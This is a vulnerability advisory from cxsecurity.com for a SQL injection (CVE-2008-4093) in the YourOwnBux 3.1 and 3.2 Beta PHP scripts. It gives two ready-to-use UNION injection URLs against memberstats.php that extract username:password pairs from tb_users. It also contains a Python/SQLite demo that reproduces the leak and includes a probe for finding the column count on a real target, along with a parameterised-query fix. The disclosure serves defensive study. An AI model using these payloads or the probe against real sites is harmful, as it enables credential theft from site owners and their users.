Bug: YourOwnBux 3.1, 3.2 Beta Remote SQL Injection Vulnerability ( Ascii Version )

YourOwnBux 3.1, 3.2 Beta Remote SQL Injection Vulnerability

Published: 2008.09.17
Credit: ~!Dok_tOR!~
Risk: Medium
CWE: CWE-89
CVE: CVE-2008-4093
Local: No
Remote: Yes

CVSS Base Score: 6.8/10
Impact Subscore: 6.4/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: Not required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

YourOwnBux 3.1, 3.2 Beta Remote SQL Injection Vulnerability

Author: ~!Dok_tOR!~
Date found: 28.08.08
Product: YourOwnBux
Version: 3.1, 3.2 Beta
Price: $39.99
DEMO: yourownbux.com/demos/
Vulnerability Class: SQL Injection
Condition: magic_quotes_gpc = Off (with magic quotes on, PHP backslash-escapes the single quote in the user parameter and the payloads below no longer break out of the quoted string)

3.2 Beta version

Exploit (one line; the injected SELECT returns 19 columns to match the original query, the username:password pair is read out through column 9, and the trailing /* comments out the rest of the original statement):

http://localhost/[installdir]/memberstats.php?user='+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,username,password),10,11,12,13,14,15,16,17,18,19+from+tb_users/*

3.1 version

Exploit (one line; the 3.1 query has one column fewer, so the injected SELECT returns 18 columns, again with username:password in column 9):

http://localhost/[installdir]/memberstats.php?user='+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,username,password),10,11,12,13,14,15,16,17,18+from+tb_users/*
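The mechanics behind the two payloads, as an added Python/SQLite example that is not part of the advisory and is not YourOwnBux code. The advisory only names the table tb_users and the columns username and password; the shape of the memberstats.php query, the other column names, the sample rows and the four-column SELECT are assumptions made for the demo (the real 3.1 and 3.2 Beta queries need 18 and 19 placeholders). The block registers a small concat_ws shim so the MySQL payload syntax runs on SQLite, shows the UNION pulling username:password out of tb_users, includes the column-count probe one would run against the real target to find the 18-versus-19 difference, and shows the same lookup with a bound parameter, where the payload returns nothing.

```python
import sqlite3

# Constructed sample data for this demo (not from the product). Only the
# table name tb_users and the columns username/password come from the
# advisory; clicks/refs and the row values are assumptions.
SAMPLE_USERS = [
    ("admin", "5f4dcc3b5aa765d61d8327deb882cf99", 120, 3),
    ("alice", "e10adc3949ba59abbe56e057f20f883e", 42, 0),
]


def _concat_ws(sep, *args):
    """Shim for MySQL's concat_ws(). MySQL treats 0x3a as the string ':',
    SQLite parses it as the integer 58, so map an integer separator back."""
    if isinstance(sep, int):
        sep = chr(sep)
    return str(sep).join(str(a) for a in args if a is not None)


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.create_function("concat_ws", -1, _concat_ws)
    conn.execute(
        "CREATE TABLE tb_users (username TEXT, password TEXT, "
        "clicks INTEGER, refs INTEGER)"
    )
    conn.executemany("INSERT INTO tb_users VALUES (?, ?, ?, ?)", SAMPLE_USERS)
    return conn


def member_stats_vulnerable(conn, user):
    """Assumed shape of the flawed memberstats.php query: the user parameter
    is pasted into the SQL string. With magic_quotes_gpc off nothing escapes
    the leading quote, so the payload closes the literal and appends a UNION."""
    sql = (
        "SELECT username, clicks, refs, 'public' FROM tb_users "
        "WHERE username = '%s' AND clicks >= 0" % user
    )
    return conn.execute(sql).fetchall()


def member_stats_safe(conn, user):
    """Same lookup with a bound parameter: the input is data, never SQL."""
    sql = (
        "SELECT username, clicks, refs, 'public' FROM tb_users "
        "WHERE username = ? AND clicks >= 0"
    )
    return conn.execute(sql, (user,)).fetchall()


def find_union_column_count(conn, query_fn, max_cols=32):
    """Probe the column count the way one would against the real target:
    grow the UNION SELECT list until the database stops complaining about a
    column mismatch. Against YourOwnBux this stops at 18 (3.1) or 19 (3.2)."""
    for n in range(1, max_cols + 1):
        probe = "' union select %s/*" % ",".join(str(i) for i in range(1, n + 1))
        try:
            query_fn(conn, probe)
            return n
        except sqlite3.OperationalError:
            continue
    return None


# The advisory's payload cut down to the four columns of the demo query,
# with username:password in the last position. The trailing /* swallows the
# remainder of the original statement (the closing quote and AND clause).
PAYLOAD = "' union select 1,2,3,concat_ws(0x3a,username,password) from tb_users/*"


def demo():
    conn = make_db()
    leaked = member_stats_vulnerable(conn, PAYLOAD)   # one row per user
    blocked = member_stats_safe(conn, PAYLOAD)        # []
    return leaked, blocked


if __name__ == "__main__":
    leaked_rows, blocked_rows = demo()
    for row in leaked_rows:
        print("leaked:", row[3])
    print("parameterised query returned", blocked_rows)
    print("union column count:", find_union_column_count(make_db(), member_stats_vulnerable))
```

The probe is the step that explains why the advisory carries two payloads: the same injection point exists in both versions, only the number of columns the original SELECT returns changed between 3.1 and 3.2 Beta, so a UNION that matches one version errors out on the other.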

References:

http://www.securityfocus.com/bid/30868
http://www.milw0rm.com/exploits/6321

Copyright 2014, cxsecurity.com